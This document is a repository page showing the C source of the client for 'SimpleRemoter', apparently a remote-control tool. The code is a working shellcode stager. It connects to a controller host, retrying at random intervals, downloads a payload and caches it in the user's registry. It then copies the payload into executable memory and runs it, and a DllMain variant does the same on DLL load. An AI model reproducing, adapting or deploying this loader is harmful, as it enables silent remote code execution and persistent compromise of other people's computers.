admin/SimpleRemoter
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
ce825cffb1e9296c1363c53653d235ab06ed0ff4
SimpleRemoter/client/main.c
yuanyuanxiang ce825cffb1 fix: No need to restart client to update wallet address
2025-11-08 18:00:21 +01:00

439 lines
14 KiB
C
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#define _CRT_SECURE_NO_WARNINGS
#include <winsock2.h>
#include <ws2tcpip.h>
#include <time.h>
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include "../common/hash.h"
#ifdef _DEBUG
#define Mprintf printf
#define IsRelease 0
#else
#define Mprintf(format, ...)
#define IsRelease 1
#endif
#pragma comment(lib, "ws2_32.lib")
#pragma pack(push, 4)
typedef struct PkgHeader {
char flag[8];
int totalLen;
int originLen;
} PkgHeader;
struct CONNECT_ADDRESS {
char szFlag[32]; // 标识
char szServerIP[100]; // 主控IP
char szPort[8]; // 主控端口
int iType; // 客户端类型
bool bEncrypt; // 上线信息是否加密
char szBuildDate[12]; // 构建日期(版本)
int iMultiOpen; // 支持打开多个
int iStartup; // 启动方式
int iHeaderEnc; // 数据加密类型
char protoType; // 协议类型
char runningType; // 运行方式
char szGroupName[24]; // 分组名称
char szReserved[20]; // 占位使结构体占据300字节
uint64_t parentHwnd; // 父进程窗口句柄
uint64_t superAdmin; // 管理员主控ID
char pwdHash[64]; // 密码哈希
} g_Server = { "Hello, World!", "127.0.0.1", "6543" };
#pragma pack(pop)
typedef struct PluginParam {
char IP[100];
int Port;
void* Exit;
void* User;
} PluginParam;
PkgHeader MakePkgHeader(int originLen)
{
PkgHeader header = { 0 };
memcpy(header.flag, "Hello?", 6);
header.originLen = originLen;
header.totalLen = sizeof(PkgHeader) + originLen;
return header;
}
int GetIPAddress(const char* hostName, char* outIpBuffer, int bufferSize)
{
struct sockaddr_in sa = {0};
if (inet_pton(AF_INET, hostName, &(sa.sin_addr)) == 1) {
strncpy(outIpBuffer, hostName, bufferSize - 1);
outIpBuffer[bufferSize - 1] = '\0';
return 0;
}
struct addrinfo hints = {0};
struct addrinfo* res = NULL;
hints.ai_family = AF_INET; // IPv4 only
hints.ai_socktype = SOCK_STREAM;
hints.ai_protocol = IPPROTO_TCP;
if (getaddrinfo(hostName, NULL, &hints, &res) != 0 || res == NULL) {
return -1;
}
struct sockaddr_in* ipv4 = (struct sockaddr_in*)res->ai_addr;
if (inet_ntop(AF_INET, &(ipv4->sin_addr), outIpBuffer, bufferSize) == NULL) {
freeaddrinfo(res);
return -2;
}
freeaddrinfo(res);
return 0;
}
bool WriteRegistryString(const char* path, const char* keyName, const char* value)
{
HKEY hKey;
LONG result = RegCreateKeyExA(HKEY_CURRENT_USER,path,0,NULL,0,KEY_WRITE,NULL,&hKey,NULL);
if (result != ERROR_SUCCESS) {
return false;
}
result = RegSetValueExA(hKey,keyName,0,REG_SZ,(const BYTE*)value,(DWORD)(strlen(value) + 1));
RegCloseKey(hKey);
return result == ERROR_SUCCESS;
}
char* ReadRegistryString(const char* subKey, const char* valueName)
{
HKEY hKey = NULL;
LONG ret = RegOpenKeyExA(HKEY_CURRENT_USER, subKey, 0, KEY_READ, &hKey);
if (ret != ERROR_SUCCESS)
return NULL;
DWORD dataType = 0;
DWORD dataSize = 1024;
char *data = (char*)malloc(dataSize+1);
if (data) {
ret = RegQueryValueExA(hKey, valueName, NULL, &dataType, (LPBYTE)data, &dataSize);
data[min(dataSize, 1024)] = '\0';
if (ret != ERROR_SUCCESS || (dataType != REG_SZ && dataType != REG_EXPAND_SZ)) {
free(data);
data = NULL;
}
}
RegCloseKey(hKey);
return data;
}
bool WriteAppSettingBinary(const char* path, const char* keyName, const void* data, DWORD dataSize)
{
HKEY hKey;
LONG result = RegCreateKeyExA(HKEY_CURRENT_USER,path,0,NULL,0,KEY_WRITE,NULL,&hKey,NULL);
if (result != ERROR_SUCCESS) {
return false;
}
result = RegSetValueExA(hKey,keyName,0,REG_BINARY,(const BYTE*)data,dataSize);
RegCloseKey(hKey);
return result == ERROR_SUCCESS;
}
bool ReadAppSettingBinary(const char* path, const char* keyName, BYTE* outDataBuf, DWORD* dataSize)
{
HKEY hKey;
LONG result = RegOpenKeyExA(HKEY_CURRENT_USER,path,0,KEY_READ,&hKey);
if (result != ERROR_SUCCESS) {
*dataSize = 0;
return false;
}
DWORD type = 0;
DWORD requiredSize = 0;
result = RegQueryValueExA(hKey,keyName,NULL,&type,NULL,&requiredSize);
if (result != ERROR_SUCCESS || type != REG_BINARY || requiredSize == 0 || requiredSize > *dataSize) {
*dataSize = 0;
RegCloseKey(hKey);
return false;
}
result = RegQueryValueExA(hKey,keyName,NULL,NULL,outDataBuf,&requiredSize);
RegCloseKey(hKey);
if (result == ERROR_SUCCESS) {
*dataSize = requiredSize;
return true;
}
*dataSize = 0;
return false;
}
#define MD5_DIGEST_LENGTH 16
const char* CalcMD5FromBytes(const BYTE* data, DWORD length)
{
static char md5String[MD5_DIGEST_LENGTH * 2 + 1]; // 32 hex chars + '\0'
if (data == NULL || length == 0) {
memset(md5String, 0, sizeof(md5String));
return md5String;
}
HCRYPTPROV hProv = 0;
HCRYPTHASH hHash = 0;
BYTE hash[MD5_DIGEST_LENGTH];
DWORD hashLen = sizeof(hash);
if (!CryptAcquireContext(&hProv, NULL, NULL, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)) {
return NULL;
}
if (!CryptCreateHash(hProv, CALG_MD5, 0, 0, &hHash)) {
CryptReleaseContext(hProv, 0);
return NULL;
}
if (!CryptHashData(hHash, data, length, 0)) {
CryptDestroyHash(hHash);
CryptReleaseContext(hProv, 0);
return NULL;
}
if (!CryptGetHashParam(hHash, HP_HASHVAL, hash, &hashLen, 0)) {
CryptDestroyHash(hHash);
CryptReleaseContext(hProv, 0);
return NULL;
}
// 转换为十六进制字符串
for (DWORD i = 0; i < hashLen; ++i) {
sprintf(&md5String[i * 2], "%02x", hash[i]);
}
md5String[MD5_DIGEST_LENGTH * 2] = '\0';
CryptDestroyHash(hHash);
CryptReleaseContext(hProv, 0);
return md5String;
}
const char* ReceiveShellcode(const char* sIP, int serverPort, int* sizeOut)
{
if (!sIP || !sizeOut) return NULL;
WSADATA wsaData;
if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0)
return NULL;
char addr[100] = { 0 }, hash[33] = { 0 };
strcpy(addr, sIP);
const char* path = "Software\\ServerD11\\settings";
char* saved_ip = ReadRegistryString(path, "master");
char* saved_port = ReadRegistryString(path, "port");
char* valid_to = ReadRegistryString(path, "valid_to");
char* md5 = ReadRegistryString(path, "version");
memcpy(hash, md5, md5 ? min(32, strlen(md5)) : 0);
int now = time(NULL), valid = valid_to ? atoi(valid_to) : 0;
if (now <= valid && saved_ip && *saved_ip && saved_port && *saved_port) {
strcpy(addr, saved_ip);
serverPort = atoi(saved_port);
}
free(saved_ip);
saved_ip = NULL;
free(saved_port);
saved_port = NULL;
free(valid_to);
valid_to = NULL;
free(md5);
md5 = NULL;
char serverIP[INET_ADDRSTRLEN] = { 0 };
if (GetIPAddress(addr, serverIP, sizeof(serverIP)) == 0) {
Mprintf("Resolved IP: %s\n", serverIP);
} else {
Mprintf("Failed to resolve '%s'.\n", addr);
WSACleanup();
return NULL;
}
srand(time(NULL));
const int bufSize = (8 * 1024 * 1024);
char* buffer = NULL;
BOOL isFirstConnect = TRUE;
int attemptCount = 0, requestCount = 0;
do {
if (!isFirstConnect)
Sleep(IsRelease ? rand()%120 * 1000 : 5000);
isFirstConnect = FALSE;
if (++attemptCount == 20)
PostMessage((HWND)g_Server.parentHwnd, 4046, (WPARAM)933711587, (LPARAM)1643138518);
Mprintf("Connecting attempt #%d -> %s:%d \n", attemptCount, serverIP, serverPort);
SOCKET clientSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (clientSocket == INVALID_SOCKET)
continue;
DWORD timeout = 30000;
setsockopt(clientSocket, SOL_SOCKET, SO_RCVTIMEO, (const char*)&timeout, sizeof(timeout));
struct sockaddr_in serverAddr = { 0 };
serverAddr.sin_family = AF_INET;
serverAddr.sin_port = htons(serverPort);
serverAddr.sin_addr.s_addr = inet_addr(serverIP);
if (connect(clientSocket, (SOCKADDR*)&serverAddr, sizeof(serverAddr)) == SOCKET_ERROR) {
closesocket(clientSocket);
SetThreadExecutionState(ES_CONTINUOUS | ES_SYSTEM_REQUIRED);
continue;
}
char command[64] = { 210, sizeof(void*) == 8, 0, IsRelease, __DATE__ };
char req[sizeof(PkgHeader) + sizeof(command)] = { 0 };
memcpy(command+32, hash, 32);
PkgHeader h = MakePkgHeader(sizeof(command));
memcpy(req, &h, sizeof(PkgHeader));
memcpy(req + sizeof(PkgHeader), command, sizeof(command));
int bytesSent = send(clientSocket, req, sizeof(req), 0);
if (bytesSent != sizeof(req)) {
closesocket(clientSocket);
continue;
}
int totalReceived = 0;
buffer = buffer ? buffer : (char*)malloc(bufSize);
if (!buffer) {
closesocket(clientSocket);
continue;
}
if (requestCount < 3) {
requestCount++;
const int bufferSize = 16 * 1024;
time_t tm = time(NULL);
while (totalReceived < bufSize) {
int bytesToReceive = (bufferSize < bufSize - totalReceived) ? bufferSize : (bufSize - totalReceived);
int bytesReceived = recv(clientSocket, buffer + totalReceived, bytesToReceive, 0);
if (bytesReceived <= 0) {
Mprintf("recv failed: WSAGetLastError = %d\n", WSAGetLastError());
break;
}
totalReceived += bytesReceived;
if (totalReceived >= sizeof(PkgHeader) && totalReceived >= ((PkgHeader*)buffer)->totalLen) {
Mprintf("recv succeed: Cost time = %d s\n", (int)(time(NULL) - tm));
break;
}
}
} else {
closesocket(clientSocket);
break;
}
PkgHeader* header = (PkgHeader*)buffer;
if (totalReceived != header->totalLen || header->originLen <= 6 || header->totalLen > bufSize) {
Mprintf("Packet too short or too large: totalReceived = %d\n", totalReceived);
closesocket(clientSocket);
if (hash[0])break;
continue;
}
unsigned char* ptr = buffer + sizeof(PkgHeader);
int size = 0;
BYTE cmd = ptr[0], type = ptr[1];
memcpy(&size, ptr + 2, sizeof(int));
*sizeOut = size;
if (cmd != 211 || (type != 0 && type != 1) || size <= 64 || size > bufSize) {
closesocket(clientSocket);
break;
}
closesocket(clientSocket);
WSACleanup();
const char* md5 = CalcMD5FromBytes((BYTE*)buffer + 22, size);
WriteAppSettingBinary(path, "data", buffer, 22 + size);
WriteRegistryString(path, "version", md5);
return buffer;
} while (1);
WSACleanup();
buffer = buffer ? buffer : (char*)malloc(bufSize);
DWORD binSize = bufSize;
if (ReadAppSettingBinary(path, "data", buffer, &binSize)) {
*sizeOut = binSize - 22;
const char* md5 = CalcMD5FromBytes((BYTE*)buffer + 22, *sizeOut);
if (strcmp(md5, hash)==0) {
Mprintf("Read data from registry succeed: %d bytes\n", *sizeOut);
return buffer;
}
}
// Registry data is incorrect
WriteRegistryString(path, "version", "");
free(buffer);
return NULL;
}
inline int MemoryFind(const char* szBuffer, const char* Key, int iBufferSize, int iKeySize)
{
for (int i = 0; i < iBufferSize - iKeySize; ++i) {
if (0 == memcmp(szBuffer + i, Key, iKeySize)) {
return i;
}
}
return -1;
}
#ifdef _WINDLL
#define DLL_API __declspec(dllexport)
#else
#define DLL_API
#endif
extern DLL_API DWORD WINAPI run(LPVOID param)
{
char eventName[64] = { 0 };
sprintf(eventName, "EVENT_%d", GetCurrentProcessId());
HANDLE hEvent = CreateEventA(NULL, TRUE, FALSE, eventName);
PluginParam* info = (PluginParam*)param;
int size = 0;
const char* dllData = ReceiveShellcode(info->IP, info->Port, &size);
if (dllData == NULL) return -1;
void* execMem = VirtualAlloc(NULL, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (NULL == execMem) return -2;
int offset = MemoryFind(dllData, MASTER_HASH, size, sizeof(MASTER_HASH)-1);
if (offset != -1) {
memcpy(dllData + offset, info->User, 64);
}
memcpy(execMem, dllData + 22, size);
free((void*)dllData);
DWORD oldProtect = 0;
if (!VirtualProtect(execMem, size, PAGE_EXECUTE_READ, &oldProtect)) return -3;
PostMessage((HWND)g_Server.parentHwnd, 4046, (WPARAM)0, (LPARAM)0);
((void(*)())execMem)();
return 0;
}
#ifndef _WINDLL
int main()
{
assert(sizeof(struct CONNECT_ADDRESS) == 300);
PluginParam param = { 0 };
strcpy(param.IP, g_Server.szServerIP);
param.Port = atoi(g_Server.szPort);
param.User = g_Server.pwdHash;
DWORD result = run(&param);
Sleep(INFINITE);
return result;
}
#else
BOOL APIENTRY DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
static HANDLE threadHandle = NULL;
if (fdwReason == DLL_PROCESS_ATTACH) {
static PluginParam param = { 0 };
strcpy(param.IP, g_Server.szServerIP);
param.Port = atoi(g_Server.szPort);
param.User = g_Server.pwdHash;
threadHandle = CreateThread(NULL, 0, run, &param, 0, NULL);
} else if (fdwReason == DLL_PROCESS_DETACH) {
if (threadHandle) TerminateThread(threadHandle, 0x20250619);
}
return TRUE;
}
#endif
Reference in New Issue View Git Blame Copy Permalink